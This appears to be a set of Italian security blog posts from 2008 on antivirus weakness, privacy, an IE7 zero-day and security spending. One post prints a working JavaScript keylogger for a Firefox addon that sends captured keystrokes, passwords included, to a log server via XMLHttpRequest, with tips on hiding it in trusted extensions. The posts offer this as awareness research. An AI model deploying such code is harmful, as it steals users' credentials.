2008-12-10T15:20:00.000-08:00

Ora che l'exploit è stato pubblicato consiglierei davvero di non usare Internet Explorer 7 fino a patch rilasciata (che dovrebbe essere a breve).

L'exploit funziona su Internet Explorer 7.0.5730.13, Windows XP SP3 e Windows 2003 con tutte le patch aggiornate. Si tratta per questo di uno 0day

La semplice navigazione su un sito web non fidato può causare l'esecuzione di codice sulla macchina client che può portare alla sua completa compromissione.

Il proof of concept mostra come sia possibile lanciare un eseguibile (calc.exe) semplicemente navigando un file html.

Per chi ancora navighi con Internet Explorer, consiglio vivamente di provarlo qui. A volte un impatto emotivo è meglio di 100 consigli

Come volevasi dimostrare

2008-12-08T04:35:00.000-08:00

Yash Kadakia, senza nemmeno aver letto il mio post (in italiano, che non conosce), ha postato su Hackers Center una sua esperienza personale che dimostra ancora una volta l'inefficacia degli Antivirus.

Solo la sua esperienza personale ha potuto salvarlo da un keylogger a dimostrazione del fatto che gli Antivirus sono ormai inutili contro le attuali minacce.

Utilizzando Sandboxie, un utility gratuita tra le mie preferite, ha potuto capire cosa, quell'eseguibile di origine sospetta, stesse facendo al suo sistema operativo (keylogging e upload dei log su ftp).

Proprio come raccontavo nel post precedente, l'Antivirus, in questo caso Avira, non è stato in grado di riconoscere il keylogger e la chiamata all'Api

GetAsyncKeyState

Una buona lettura che consiglio anche agli "esperti".

Il post è disponibile qui .

L'Antivirus è morto

2008-12-06T01:01:00.000-08:00

Qual'è il miglior Antivirus? Quello che consuma meno Ram.
Il titolo prende spunto da un famoso post di Amrit Williams, che da ex dipendente di McAfee ha un opinione molto più autorevole della mia.

Titolo sensazionalistico a parte, ci sono molti motivi per dubitare dell'effettiva utilità degli Antivirus.

Nonostante non se ne possa fare a meno, gli antivirus sono stati per troppi anni considerati come uno strumento di "protezione" producendo quel "False sense of security" per citare Bruce Schneier, che è il peggiore nemico della vera sicurezza.

Ci sono interi siti autoproclamatisi di "sicurezza informatica" che hanno del "Qual'è il miglior Antivirus" la loro mission.

L'utente medio, poco esperto, dovrebbe però capire da cosa l'Antivirus protegge.
L'antivirus è indispensabile nel caso di virus noti e già in circolazione su larga scala.

L'antivirus è uno strumento inutile (a molto fastidioso) per quelle minacce in piccola scala, custom-made o rootkit.

La maggior parte degli antivirus in commercio (per centinaia di dollari) basa il riconoscimento dei virus su signature dell'eseguibile e posizionamento all'interno della macchina infetta.

La signature è un codice di lunghezza fissa ottenuto da una stringa a lunghezza variabile.
(molto simile al risultato di un md5 per rendere la discussione estremamente semplice).

Le definizioni dei virus (quelle che si aggiornano giornalmente) contengono appunto queste signature.

La bellezza della signature è che cambiando un singolo carattere alla stringa da cui viene generata, cambia completamente anch'essa.

Nello specifico, se il virus cambia il suo codice di un singolo byte, l'Antivirus è un'icona nella tray e 200Mb di Ram in meno. Nient'altro.

L'approccio per signature ha problemi di scalabilità che lo stesso signor Kaspersky ha ammesso.
Produrre la signature di un virus è un operazione che richiede un intervento umano.
Le aziende di Antivirus hanno migliaia di dipendenti allo scopo.
Un'ondata di "noise" virus, tutti diversi tra loro produrrebbe un sovraccarico di lavoro e un conseguente rallentamento nel rilevamento dei veri virus che avrebbero tempo a sufficienza per diffondersi.

Con l'aumentare delle signature da controllare, inoltre, si ha un rallentamento della velocità di scansione dei file. Ogni file che viene aperto su un computer viene comparato con un database di signature sempre più grande.

Non solo. Gli Antivirus sembrano anche soffrire di demenza senile (funzionano con tecnologie vecchie 10 anni). Molti di loro non sono nemmeno in grado di riconoscere API di Windows potenzialmente dannose come la

GetAsyncKeyState

funzione utilizzata per recuperare i dati digitati da tastiera.
Un minimo di intelligenza in questi software avrebbe permesso di capire quando tale funzione è utilizzata per scopi legittimi e quando invece ad esempio, il buffer recuperato da tastiera viene inviato via mail.

Scrivere un keylogger in C è un'operazione che possono fare davvero in molti.
Provate a compilare tale codice con qualche modifica. Poi fate una scansione con il vostro Antivirus.
Se un vostro amico vuole giocarvi uno scherzetto, non c'è Antivirus che lo possa fermare. Gli bastano, Google, copia e incolla e un compilatore. Nessuna reale conoscenza nè di programmazione tanto meno di hacking.

I vendor di antivirus, negli ultimi anni, hanno combattuto una guerra interna per accaparrarsi nuove quote del mercato entry-user. E hanno dimenticato di combattere contro chi sfornava virus polimorfici, rilocazione dinamica e mille altre diavolerie. Esercizi di stile più che altro.
Bypassare un antivirus è come uccidere una mosca con un cannone.

L'interfaccia di questi programmi è diventata sempre più accattivante (e pesante).
L'efficacia sempre la stessa. Un po come avere il motore di una 500 su una carrozzeria Ferrari.

Da notare che sinora si è parlato solo dei classici virus. I rootkit sono tutta un'altra storia.
Non c'è Antivirus che sia in grado di fornire la benchè minima protezione contro questo tipo di virus (presenti ormai da almeno 4-5 anni) nonostante quello che si legga in press release e recensioni.

Dal Morris worm ad oggi molte cose sono cambiate. Chi scrive malware non lo fa più per fama.
C'è un settore da centinaia di milioni di dollari dietro Botnet e malware, che vengono usati per spam al fine di frodare i cosiddetti utenti medi. Con tali interessi in gioco, le minacce si sono fatte sempre più sofisticate e insistenti. Mentre McAfee et al. raffinavano l'interfaccia grafica.

E' di pochi giorni fa una ricerca di Stephan Chenette di Websense dal nome Script fragmentation attack. La trovo interessante quanto semplice da realizzare.
Bypassare Antivirus su desktop o sul gateway è possibile frammentando lo scaricamento del codice malware dalla rete. In breve, una pagina web contiene un normalissimo e legittimo codice che provvederà a scaricare il codice malware byte per byte da sorgenti diverse.
Un codice del genere si trova in qualsiasi sito Web 2.0 che usi Ajax ad esempio. Quindi nessuna minaccia in se stessa.
Una volta scaricato tutto il payload il malware può essere lanciato senza che l'antivirus abbia avuto modo di "vedere" tutto il codice.
Nessuna soluzione è al momento disponibile per tale problema se non disattivare Javascript.
(Morte del Web 2.0, di Facebook e altre amenità).

La sicurezza desktop, o endpoint security nel gergo aziendale, è più questione di cultura che di tool. Le aziende dovrebbero spendere meno per gli Antivirus e di più in corsi e training per dipendenti. Solo con una cosciente cultura di sicurezza informatica un'azienda può sopravvivere ai costi crescenti dovuti a spam e interruzioni di servizio causati da malware. Che gli Antivirus non sono stati in grado di mitigare.

Linux sull'iPhone ora è possibile

2008-12-01T08:26:00.001-08:00

Un gruppo di hacker è finalmente riuscito a vincere un'altra battaglia contro Apple.
Linux finisce sull'iPhone di prima e seconda generazione. Il Kernel 2.6 è supportato.

Al momento la versione di Linux caricata è molto scarna, wireless e touch screen non ancora supportati ma siamo solo all'inizio.

iPhone Linux Demonstration Video from planetbeing on Vimeo.

Qui ci sono le istruzioni per l'installazione. E qui i file di installazione.

A parte l'esercizio di stile di questi "hacker", aziende come HTC, Hp o Palm non dovrebbero saper ascoltare il mercato e sfornare una palmare che supporti pienamente il sistema operativo Linux senza che qualcuno violi le leggi? Hint: date un'occhiata al numero di Digg ricevuti dal blog del gruppo in soli 5 giorni...

Lo spam su facebook costa caro. 700 milioni di euro

2008-11-25T07:38:00.000-08:00

Esattamente 837 milioni di dollari. Corte di San Jose, California. Il più grande risarcimento per spam della storia. Adam Guerbuez, che non ha un avvocato e non si è presentato davanti al giudice, dovrà pagare una cifra enorme per risarcire Facebook dopo essere riuscito ad inviare 4,5 milioni di messaggi con Subject "mariujana" e "sex toys" ai membri del social network più popolato della rete.

Il buon Adam, che non è un collegiale sprovveduto ma un imprenditore canadese vive ancora nella sua dimora e "sarà fatto tutto il possibile affinchè almeno una parte della sanzione venga pagata".

Facebook fatturerà quest'anno intorno ai 300 milioni di dollari. Gli 837 milioni di dollari sono solo una pena esemplare (nonostante sia 3 volte il fatturato) che farà da deterrente, allontanerà malintenzionati e alleggerirà il lavoro di chi in Facebook avrebbe dovuto evitare che ciò accadesse. (Un filtro anti spam come akamai non sarebbe stato male no?)

A proposito, facendo due conti, ogni messaggio è costato circa $186.
Adam non sarà uno sprovveduto ma di sicuro non l'avrebbero preso alla Luiss.
Come direbbe Cetto La Qualunque, "non sono cifre da paese civile..."

La privacy è come la verginità

2008-11-17T15:34:00.000-08:00

Quando l'hai persa. L'hai persa per sempre.

Ma in un mondo di Social Media Whores (Smores) esser casti è come essere puliti vivendo tra le scimmie per dirla alla Confucio.

Ma cos'è la privacy? Avere il mio nome e cognome? La mia foto? Dove abito?
Hanno già le mie conversazioni. Hanno inventato i keylogger stealth. I Blackberry che sanno bene da fabbrica dove conservare i miei dati. I presidenti conniventi. Gli Antivirus che non servono a nulla. E le telecamere di video sorveglianza.

Ci preoccupiamo di fare DNS che rispettino la privacy. In modo tale che il mio ISP non sappia dove navigo. Uh. Il mio ISP? Telecom. Quello dello spionaggio, si.

Abbiamo una legge sulla privacy che ha aggiunto burocrazia e costi. Tutelato il nulla.

Perché il vero problema non è se risalgono alla mia abitazione. Quella la trovi su Facebook insieme alla mia relationship status. Te la do molto volentieri. Perché ho bisogno dei miei 15 minuti di popolarità. Di misurare il significato di una precaria esistenza attraverso il numero di amici con cui "sono connesso". E me ne compiaccio.

Il vero problema è se risalgono alla mia carta di credito. Ai miei conti bancari.

Ma in Italia non esiste un FTC, come negli Stati Uniti.
Un ente che forza le organizzazioni che subiscono data breach a:

Denunciare immediatamente l'avvenuto
Fare mea culpa in pubblico
Sostenere i costi legali della class action che ne consegue
Pagare multe pesantissime
Effettuare assessment di sicurezza ogni 2 anni per i 20 successivi. 20 anni...
20 anni...

Ma di quale privacy parliamo?

Il Social Network (che mi guardo bene dal chiamare Web 2.0)
è troppo "eccitante" per non infilartici dentro. Ci stanno già tutti dentro.

Dai ammettilo. Hai bisogno di "connetterti e condividere" coi tuoi amici.
E poi la relationship status, quel booleano che ti apre nuovi orizzonti...

L'11 Settembre è stato troppo "eccitante" per non infilarci, tra il panico generale, leggi a protezione di chi per il governo effettuava lo spionaggio. Perché i cattivi erano tra noi. Quelli italiani usavano Telecom e stavano nella Juve.

La privacy si perde da piccoli. Ogni mossa che fai, ogni carta che firmi, ogni sito a cui ti registri ogni volta che alzi il telefono. Non fatevi ingannare. Non c'è più nessuno vergine a questo mondo.
E il nostro garante, non è una cintura di castità ma solo uno specchietto per le allodole.

P.S. Quell'Armando Romeo su Facebook non sono io...

Firefox Addon - Fidarsi è bene...

2008-11-08T06:44:00.000-08:00

Tempo fa mi sono trovato a dover imparare il linguaggio XUL per la creazione di estensioni firefox.
Le estensioni (o addon) di Firefox si basano principalmente su XML e Javascript. Solo raramente e in caso di funzionalità più avanzate si possono appoggiare a C++ o a Java tramite l'utilizzo di Xpcom.

Mi sono chiesto dunque quale fossero i limiti di sicurezza di un addon per firefox visto e considerato che l'utente medio (e non solo) considera un addon per browser come un innocua estensione alle funzionalità già fornite dal browser.

Il risultato della mia ricerca, già pubblicata qualche mese fa su Hackers Center, è un keylogger completamente stealth agli anti virus e a Noscript.

Non ha bisogno di appoggiarsi a interfacce XPCOM quindi si basa esclusivamente su Javascript per catturare tutto ciò che viene digitato nel browser (password, carte di credito e quant'altro).

Il payload catturato si può poi tranquillamente reindirizzare ad un server remoto in maniera asincrona e silenziosa visto che Javascript offre xmlHTTPRequest , fondamento di Ajax.
Nessuna notifica dell'apertura di un link esterno viene mostrata, nemmeno nella status bar.

Qui trovate l'estensione fomato xpi, che è possibile installare semplicemente trascinandola nella finestra del browser Firefox. Nello zip è presente un file log.php da inserire su localhost. Questo è il file che si preoccuperà di ricevere il payload (i tasti digitati) e salvarli su file sul server.
Tutto ciò può essere testato in locale.

Per visionare il codice contentuto nell'estensione:

Rinominare il file .xpi in .zip
Estrarlo
Aprire il file .xul che trovate all'interno

Piccola descrizione del codice javascript dell'estensione (in poc_keylogger.xul):

document.addEventListener("keypress",onkey,false);
var key_str='';
function onkey(e) {
key_str+=String.fromCharCode(e.charCode);
if (key_str.length>50) {
http=new XMLHttpRequest();
http.open("GET","http://localhost/hackerscenter/log.php?c=" + key_str,true);
http.send(null);
key_str='';
}

}

Sulla prima linea aggiungamo un event listener per l'evento keypress. Ogni volta che un testo verrà premuto verrà richiamata la funzione onkey() a cui viene passato l'oggetto evento.

Attraverso questo oggetto recuperiamo il codice del tasto premuto con event.charCode.

Bufferizziamo i tasti premuti e poi inviamo il tutto a xmlHttpRequest che passerà il payload (contenuto del buffer) al nostro server in ascolto (log.php).

Facile e potente.

Da notare che utilizzando Xpcom, ovvero librerie C++ o Java caricate esternamente, potremmo nascondere tale codice che nel nostro POC è facilmente leggibile.

Cosa c'è di pericoloso in questo POC:

Il codice Javascript viene eseguito nel contesto del browser
L'Antivirus non lo rileva
NoScript non lo rileva
La comunicazione del payload al server in ascolto avviene su porta 80: il Firewall non lo rileva

Da notare che con Firefox 3 ci sono maggiori restrizioni ai siti web dai quali è concesso installare un estensione. Tuttavia non esiste alcuna restrizione allo scaricamente dell'XPI di installazione e al trascinamento manuale di quest'ultimo nella finestra del browser.

Tale procedura richiede ovviamente la cooperazione da parte dell'utente, motivo per il quale tale attacco non riveste una grossa minaccia all'utente esperto che è a conoscenza dei rischi legati ad addon di terze parti non fidate. (does he?)

Inoltre è possibile inserire tale codice:

in estensioni note (barra di google, delicious button...)
in nuove estensioni pubblicate sul sito di Mozilla Addons, che è nella whitelist del browser per quanto riguarda i siti abilitati all'installazione di Addon

Il secondo approccio è stato già utilizzato da hacker vietnamiti che hanno inserito codice malevolo nell'estensione per la lingua vietnamita disponibile direttamente dal sito di Mozilla riuscendo ad infettare centinaia di migliaia di utenti in pochi giorni.

Piccola ricerca che ha lo scopo di rendere noto a tutti le potenzialità e i problemi di sicurezza legati alle estensioni e addon di Mozilla.

Sicurezza produce efficienza che produce guadagno

2008-10-28T10:06:00.000-07:00

Concludendo la trilogia di post a riguardo di investimenti nel settore della sicurezza informatica
non potevo che concludere con un messaggio di speranza.

Stravolgere il modo di pensare del management di un'azienda richiede un tempo ancora lungo
Leggi in merito e regulations faranno da propulsore ad una nuova cultura che possa vedere la sicurezza sotto un'ottica di risparmio e guadagno e non più come un fastidioso costo da sostenere.
Soprattutto in periodi di tagli ai costi per rimanere competitivi.

Può una spesa in favore di sicurezza informatica diventare un vero e proprio investimento?
Certamente si.

Tecnologie di sicurezza hanno negli anni reso possibile l'implementazione di altre tecnologie che
hanno a loro volta reso possibile nuovi processi di business e aumentato la produttività.

Un esempio lamapante sono le VPN.
Confidenzialità dell'informazione tra postazioni remote è stata la parola chiave senza la quale
connettere 2 locazioni tra esse lontane non sarebbe stato altrimenti possibile.

Chi andrebbe a connettere una postazione remota con scambio di dati critici senza la presenza
di metodi di cifratura affidabili. La sicurezza è stata la chiave per una enabling technology.

Le VPN hanno aperto a nuovi modi di concepire il lavoro. Avere l'ufficio in casa o connettere 2 branch in continenti diversi migliora l'efficienza e la produttività innegabilmente. E la sicurezza è condizione necessaria perchè ciò avvenga.

Firma digitale
Un'altra rivoluzionaria tecnologia che "potrebbe" fare da enabling technology.
Ho avuto l'opportunità di partecipare attivamente ad un progetto del CNR di Pisa il cui principale
obiettivo era quello di semplificare il più possibile la circolazione di documenti elettronici in una organizzazione andando ad abbattere i costi legati alla gestione dei cartacei che sono assolutamente rilevanti e paradossali nel 2008.

La firma digitale in ambiente privato aziendale velocizzerebbe molti processi di approvazione
di documenti senza dover passare di dipartimento in dipartimento in maniera cartacea solo per la necessità della firma.
Un repository dei documenti su un server + una certification authority interna andrebbe a liberare interi uffici e burocrati. Un enorme risparmio, a fronte di qualche policy in più.

Nella pubblica amministrazione lo Stato andrebbe a risparmiare un quantitativo enorme di denaro nella gestione delle pratiche che verrebbero altrettanto velocizzate.
Molti uffici scomparirebbero, molti posti di lavoro (inutile), si perderebbero.

A guadagnarci sarebbe lo Stato e il cittadino. Un po meno per chi dal timbra, protocolla e firma ne ha tratto stipendio.

Ancora una volta una tecnologia di sicurezza che permette un guadagno rilevante in termini di maggiore efficienza e abbattimento dei costi.

Il problema della firma digitale, in Italia sopattutto, è un problema di mentalità.
Lo Cnipa ha già regolarizzato la questione qualche anno fa.
Nonostante ciò, il timore della ripudiabilità della firma è sentito ancora forte.

L'ultimo esempio è quello del commercio elettronico "sicuro", che non esiste ma che nel migliore dei mondi possibili sarebbe stato reso possibile solo tramite l'uso di tecnologie di sicurezza operanti a vari livelli (dal 3 al 7 dell'OSI classico).

Prima chiariamo perché non esiste attualmente.

Navigando in uno dei siti di e-commerce europei più in vista
si leggono testuali parole:

"Grazie a questa tecnologia, che utilizza un complesso sistema di crittografia con chiave a 40 bit, le informazioni riservate, inviate al server sicuro X, viaggiano su Internet solo in forma criptata, ovvero codificate secondo un complesso algoritmo matematico che ne garantisce l'illeggibilità da parte di
chiunque voglia intromettersi durante la comunicazione tra Voi e X"

40 bit? Complesso sistema di crittografia? Qualcuno dica a questi signori che gli Stati Uniti,
dopo la seconda guerra mondiale, furono abbastanza lungimiranti nel proibire l'esportazione
di algoritmi di cifratura "troppo potenti" (per i loro cluster di decifratura).

Ma "40 bit" non è troppo potente. E' semplicemente troppo ridicolo e fuori anche dagli standard PCI che dettano un limite minimo di 128 bit.

Il commercio elettronico è stata un'onda cavalcata ancor prima che la sicurezza potesse fornirgli gli strumenti adeguati ad una sua legittima diffusione. La confidenzialità della comunicazione è solo la punta dell'iceberg di una serie di vulnerabilità a cui questi siti possono andare incontro.

A metterci una pezza, dopo anni in cui siti di ecommerce sono nati da realtà di ogni natura e dimensione, sono state le regulation per la PCI compliance che rende questi siti finalmente responsabili delle loro stesse inadempienze.

In un mondo ideale (quello in cui vivono la maggior parte degli appassionati di sicurezza)
sarebbe stata la sicurezza a fare da enabling technology per il commercio elettronico
e non il contrario. In questo caso un piano di sicurezza (per il cliente e per il fornitore) sarebbe dovuto nascere ben prima di qualsiasi carrello elettronico.

E' chiaro quindi che la PCI compliance, nel mondo reale a 40 bit, diventa un costo da sostenere e non più un opportunità.